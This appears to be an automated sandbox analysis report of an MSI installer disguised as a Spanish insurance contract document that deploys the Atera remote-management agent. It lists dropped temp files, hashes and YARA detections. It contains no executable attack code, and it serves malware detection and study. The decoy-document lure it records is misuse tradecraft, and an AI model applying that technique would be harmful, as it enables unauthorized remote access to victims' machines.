                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF9A61AC92F781C523.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF9CAD11B6C8C4B523.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2583168101301414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:jgduksNveFXJ7T5fcvwPVqISoedGPdGfoprdStedGPdGRub1n:cdVjTIwPoIVox
                                                                                                                                                                                                                                        MD5:C8CC67F116455FC7394F8764E2F406D6
                                                                                                                                                                                                                                        SHA1:D4E0561229655095728AB7124BC6627FD4D909BB
                                                                                                                                                                                                                                        SHA-256:B02AC5B89791AE815507F422D1AE46EA1AD2B4AE2F0E52B9A8006747FE5A77D8
                                                                                                                                                                                                                                        SHA-512:E51D8078030934691E3BF4A594BFFA0B2212EBABB54B936C4627BE7236FF569926C8DB242D3E477B0B6DC75284BCEE0AE806B4D33A83BF3C132236C20240E0CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF9CAD11B6C8C4B523.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFA24ABE8BCDD2C3AC.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2220113235080219
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:O8PhcuRc06WXJEnT5EDoqISoedGPdGTpaStedGPdGTn:Bhc1HnTKD9IRD
                                                                                                                                                                                                                                        MD5:B02D184ABEFCAA55915403BFDE2EFE3B
                                                                                                                                                                                                                                        SHA1:5900CE5EC566A8C9532D94C58E8936AD59EFD15F
                                                                                                                                                                                                                                        SHA-256:63F0328A3DCF29AB309DA827ADBF86855B8D0977D79F5A5DAE1F6025ABD2D5D1
                                                                                                                                                                                                                                        SHA-512:C75F606F8EF89B1000961E7ECC9E54237590F277F1D4AD19C775D3C67BE468666529FC98576BD4683B2EB8BE733DA9D587CA328183B1894CC4085DD7FA66BFC3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA24ABE8BCDD2C3AC.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFA33F85AAEEE1E7D7.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5724552824701887
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:18PhluRc06WXJknT5fcvwPVqISoedGPdGfoprdStedGPdGRub1n:Yhl1nnTIwPoIVox
                                                                                                                                                                                                                                        MD5:105760E09A8EA67D0176DA206D04E4C2
                                                                                                                                                                                                                                        SHA1:6B26C0EC7F3D0CE7D7435F45B56D8B0B19E87AD5
                                                                                                                                                                                                                                        SHA-256:B41E06A67E1D7750425659ACF8DFDB2681800630B853643A8B2374C7A42293FA
                                                                                                                                                                                                                                        SHA-512:128BDC3DF5122E8AB93DFF572DE271AE18EE36BEEC0E2BC60DD7F56813CC370A97F7CECB7CCC1BE67A0F967872082827D67E02E360F149556E61BF927BE68234
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA33F85AAEEE1E7D7.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFA4F603106DD881B4.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.16390011606364135
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:TEubmStedvPdv+qISoedvPdvbCnuhnq9fn0tOEBP8:hybIciuBu/0tOi8
                                                                                                                                                                                                                                        MD5:3E719D51F6315346A0BFFF0CD624CC5D
                                                                                                                                                                                                                                        SHA1:2E9B8901AB588046889FFFB94095AAFCDFCACF30
                                                                                                                                                                                                                                        SHA-256:49260C53CACF72182E227ABEA0817F1F302AF0E2CF73C9A3FEDED4D49BBF8E2A
                                                                                                                                                                                                                                        SHA-512:89358C5316BDDCFFC2839EB0999D5E81C3705CBDC10B7E84833A2DD9FB2699E226171434457697B493F1D0481DC4AC53B8B07F16872A27A7D20AB269C4A7EF4E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFA4F603106DD881B4.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFB49845DCA9307884.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001214832732552
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:D5MMXukNveFXJbT5piDtqISoedvPdvbCnuhnq9fn0tOEBdStedvPdvxubS:DbXeDTniDwIciuBu/0tOG4
                                                                                                                                                                                                                                        MD5:2B6C91199C44D747CAE7723472AC64E0
                                                                                                                                                                                                                                        SHA1:AEB6FEA27DD2DFDE5ECC14D139E386D85D079AF8
                                                                                                                                                                                                                                        SHA-256:DE019C8845EA74B3B4B08622F0AA9D46D1896A27D13117DDC30A69A5808F99F0
                                                                                                                                                                                                                                        SHA-512:B5F4D308A0B953A149E109DF84F33E337B9DFBF43B0348DEC44186E02A68312BEA95E03D93219D0F9FCE1468CB8CEE82999C18ECB1F87F1636D86A9532619971
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFB49845DCA9307884.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFBCD2CB482E94EC88.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5724552824701887
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:18PhluRc06WXJknT5fcvwPVqISoedGPdGfoprdStedGPdGRub1n:Yhl1nnTIwPoIVox
                                                                                                                                                                                                                                        MD5:105760E09A8EA67D0176DA206D04E4C2
                                                                                                                                                                                                                                        SHA1:6B26C0EC7F3D0CE7D7435F45B56D8B0B19E87AD5
                                                                                                                                                                                                                                        SHA-256:B41E06A67E1D7750425659ACF8DFDB2681800630B853643A8B2374C7A42293FA
                                                                                                                                                                                                                                        SHA-512:128BDC3DF5122E8AB93DFF572DE271AE18EE36BEEC0E2BC60DD7F56813CC370A97F7CECB7CCC1BE67A0F967872082827D67E02E360F149556E61BF927BE68234
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFBCD2CB482E94EC88.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFBD3ED4C892EF965C.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001214832732552
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:D5MMXukNveFXJbT5piDtqISoedvPdvbCnuhnq9fn0tOEBdStedvPdvxubS:DbXeDTniDwIciuBu/0tOG4
                                                                                                                                                                                                                                        MD5:2B6C91199C44D747CAE7723472AC64E0
                                                                                                                                                                                                                                        SHA1:AEB6FEA27DD2DFDE5ECC14D139E386D85D079AF8
                                                                                                                                                                                                                                        SHA-256:DE019C8845EA74B3B4B08622F0AA9D46D1896A27D13117DDC30A69A5808F99F0
                                                                                                                                                                                                                                        SHA-512:B5F4D308A0B953A149E109DF84F33E337B9DFBF43B0348DEC44186E02A68312BEA95E03D93219D0F9FCE1468CB8CEE82999C18ECB1F87F1636D86A9532619971
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFBD3ED4C892EF965C.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFBE8D32C4C485895E.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.14610166728728677
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:CnVubmStedGPdGeqISoedGPdGfopr0kmcv:icyLI8kD
                                                                                                                                                                                                                                        MD5:B9A81AEC5D0A75411A51FC7F54D8E1A1
                                                                                                                                                                                                                                        SHA1:BB48D14483BD5ADE3098BE3EF8F61DBDD1F3CC23
                                                                                                                                                                                                                                        SHA-256:507200043B018A9B4208E17D938A50CDB18C6F262F577997A6B883F314B0CECE
                                                                                                                                                                                                                                        SHA-512:808327F1B455D20EC1D23C6D9435792EF38116E6BB89968A0883C0A5F1F42D3207891BD8048A18DAB7AA7688F02DBDF69F6EC98CA6211A66B1C607CA1A9ADAFC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFBE8D32C4C485895E.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFC20E1DF72867B031.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2583168101301414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:jgduksNveFXJ7T5fcvwPVqISoedGPdGfoprdStedGPdGRub1n:cdVjTIwPoIVox
                                                                                                                                                                                                                                        MD5:C8CC67F116455FC7394F8764E2F406D6
                                                                                                                                                                                                                                        SHA1:D4E0561229655095728AB7124BC6627FD4D909BB
                                                                                                                                                                                                                                        SHA-256:B02AC5B89791AE815507F422D1AE46EA1AD2B4AE2F0E52B9A8006747FE5A77D8
                                                                                                                                                                                                                                        SHA-512:E51D8078030934691E3BF4A594BFFA0B2212EBABB54B936C4627BE7236FF569926C8DB242D3E477B0B6DC75284BCEE0AE806B4D33A83BF3C132236C20240E0CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFC20E1DF72867B031.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFD939BC98ADC26595.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):1.2220113235080219
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:O8PhcuRc06WXJEnT5EDoqISoedGPdGTpaStedGPdGTn:Bhc1HnTKD9IRD
                                                                                                                                                                                                                                        MD5:B02D184ABEFCAA55915403BFDE2EFE3B
                                                                                                                                                                                                                                        SHA1:5900CE5EC566A8C9532D94C58E8936AD59EFD15F
                                                                                                                                                                                                                                        SHA-256:63F0328A3DCF29AB309DA827ADBF86855B8D0977D79F5A5DAE1F6025ABD2D5D1
                                                                                                                                                                                                                                        SHA-512:C75F606F8EF89B1000961E7ECC9E54237590F277F1D4AD19C775D3C67BE468666529FC98576BD4683B2EB8BE733DA9D587CA328183B1894CC4085DD7FA66BFC3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFD939BC98ADC26595.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFE62401949C7E8798.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFEA59E954C7A9A6E9.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):1.001214832732552
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:D5MMXukNveFXJbT5piDtqISoedvPdvbCnuhnq9fn0tOEBdStedvPdvxubS:DbXeDTniDwIciuBu/0tOG4
                                                                                                                                                                                                                                        MD5:2B6C91199C44D747CAE7723472AC64E0
                                                                                                                                                                                                                                        SHA1:AEB6FEA27DD2DFDE5ECC14D139E386D85D079AF8
                                                                                                                                                                                                                                        SHA-256:DE019C8845EA74B3B4B08622F0AA9D46D1896A27D13117DDC30A69A5808F99F0
                                                                                                                                                                                                                                        SHA-512:B5F4D308A0B953A149E109DF84F33E337B9DFBF43B0348DEC44186E02A68312BEA95E03D93219D0F9FCE1468CB8CEE82999C18ECB1F87F1636D86A9532619971
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFEA59E954C7A9A6E9.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFF1BF44F6980C65B5.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFF74AB66B1D2368FD.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                                                                                        Entropy (8bit):0.1307931415115954
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:CnAipVfedGSadGS7qIipVGedGSadGSfEqasJGMWTZky+gH+nr:CnAStedGPdGeqISoedGPdGTpTN
                                                                                                                                                                                                                                        MD5:6764A1A6816DFAF91A90069FA7ADA2E3
                                                                                                                                                                                                                                        SHA1:8721A89A2E96576277C6663773581D64D5255830
                                                                                                                                                                                                                                        SHA-256:F8CBC6D59A06DE9FB7F39D502F2E47070C1F4F57A8866ABF304C7766B9EE9869
                                                                                                                                                                                                                                        SHA-512:4E94A050BC6EFCC3B9F976D7BC30B6B6A139720B934310A22727953393A978428EED3BE0E11DB584FA693299BB3138D650B42C52444ED1CE1CCCC98C3821B5CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFF74AB66B1D2368FD.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DFFF90E70B133489B1.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        \Device\ConDrv

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (337), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5166
                                                                                                                                                                                                                                        Entropy (8bit):5.050534959945823
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:rkgmgcvg0Q/gnSi++aPGl7p7Al4gnSi++aPGl7p7Ac:+TVL/N7c9L/N79
                                                                                                                                                                                                                                        MD5:B42F49D12DD7FAEA77129DAE131FEEF1
                                                                                                                                                                                                                                        SHA1:121D726A800C8AD53D894F07A0E10E957AD8EF17
                                                                                                                                                                                                                                        SHA-256:200F0C1973A0107F1A70CA3528E89528C7F3924983D6CFF436CE280F35D77119
                                                                                                                                                                                                                                        SHA-512:38DAE0AD4FFB11CA8B5875C613714F2395D23016D2A3939424CEE7DB4E874FFC29C8ED91B273D3D928DF5D468E04E1D4949CD404A43B404140770085CC5C1E3A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-12-17 12:46:58.3303|ERROR|WuApiService|Error on retry number 1: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....2024-12-17 12:48:30.4134|ERROR|WuApiService|Error on retry number 2: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....2024-12-17 12:50:38.5869|ERROR|WuApiService|Error on retry number 3: The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.....2024-12-17 12:52:32.7234|ERROR|AgentPackageOsUpdates|Error executin

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Entropy (8bit):7.878657935554641
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Microsoft Windows Installer (60509/1) 57.88%
                                                                                                                                                                                                                                        • ClickyMouse macro set (36024/1) 34.46%
                                                                                                                                                                                                                                        • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                                                                                                                                                                                                        File name:Documento_Contrato_Seguro_25105476.msi
                                                                                                                                                                                                                                        File size:2'994'176 bytes
                                                                                                                                                                                                                                        MD5:730547d4a223468fc2d62e952cac6ff7
                                                                                                                                                                                                                                        SHA1:e5c8739f303913647d811a6f63749e9a66fbb70a
                                                                                                                                                                                                                                        SHA256:8c4de817222fdc2f782d6012c1d11b10f5c270b88053c27c088e7cbda75936e5
                                                                                                                                                                                                                                        SHA512:884f80716c8cacbc130ed85d7306d5b2f4df7a181fdb99c46aec43b7796ef5e400cdd15a6dbaaad6f3a221f1e46e9ec0e50a2cfe76a72ea953c182ce4b8ae395
                                                                                                                                                                                                                                        SSDEEP:49152:h+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:h+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                        TLSH:42D523127584483AE37B0A358D7AD6A05E7DFE605B70CA8E9308741E2D705C1AB76FB3
                                                                                                                                                                                                                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:2d2e3797b32b2b99

